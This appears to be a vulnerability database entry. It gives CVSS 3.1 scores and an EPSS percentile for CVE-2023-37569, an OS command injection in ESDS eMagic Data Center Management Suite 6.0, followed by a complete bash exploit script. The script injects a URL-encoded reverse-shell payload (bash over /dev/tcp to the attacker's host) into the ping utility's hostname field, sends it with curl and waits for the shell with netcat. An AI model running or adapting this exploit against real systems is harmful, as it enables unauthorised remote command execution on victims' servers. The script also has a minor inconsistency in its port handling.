CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
84.0%
#!/bin/bash
# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569
URL=$1
LHOST=$2
LPORT=$3
echo "*****************************"
echo "* ESDS eMagic 6.0.0 RCE *"
echo "* > CVE-2023-37569 *"
echo "* > Shubham & thewhiteh4t *"
echo "*****************************"
if [ $# -lt 3 ]; then
echo """
USAGE :
./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
exit 1
fi
url="$1/index.php/monitor/operations/utilities/"
echo "[+] URL : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
post_data="utility=ping&operations=yes&hostname=%3B%20$payload¶m_before=¶m_after=&probe_id=1&rndval=1682490204846"
echo "[!] Triggering exploit..."
echo $url
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
echo "[+] Catching shell..."
nc -lvp 4444